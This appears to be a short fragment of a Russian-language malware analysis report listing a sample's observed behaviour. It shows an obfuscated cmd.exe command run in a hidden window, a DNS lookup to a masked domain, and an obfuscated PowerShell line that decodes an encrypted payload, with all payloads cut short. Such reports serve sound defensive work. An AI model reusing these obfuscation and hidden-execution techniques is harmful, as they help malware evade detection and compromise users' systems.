Техническая информация
- '<SYSTEM32>\cmd.exe' KwCGUQIKO iosHrWlmLwaRGkEZKUcb VouztvwmuBcPM & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FfQlIZOzZppFAkw%=opnwuhHMrLQf&&set %dDfpFPwzBZk%=p&&set %zbzVqaXLoaq%...
- DNS ASK qw####sewqeeqw.com
- '<SYSTEM32>\cmd.exe' KwCGUQIKO iosHrWlmLwaRGkEZKUcb VouztvwmuBcPM & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %FfQlIZOzZppFAkw%=opnwuhHMrLQf&&set %dDfpFPwzBZk%=p&&set %zbzVqaXLoaq%...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " & ( $pShOme[21]+$PsHomE[34]+'x')( ( .('N'+'eW-obJeC'+'t') ('ManAgement.A'+'u'+'tOmATI'+'O'+'n.P'+'Sc'+'R'+'EdENti'+'a'+'L') ' ', ('76492d1116743f0423413b16050a5345MgB8AFYAVgArAE8AVgAyAFYAbABz...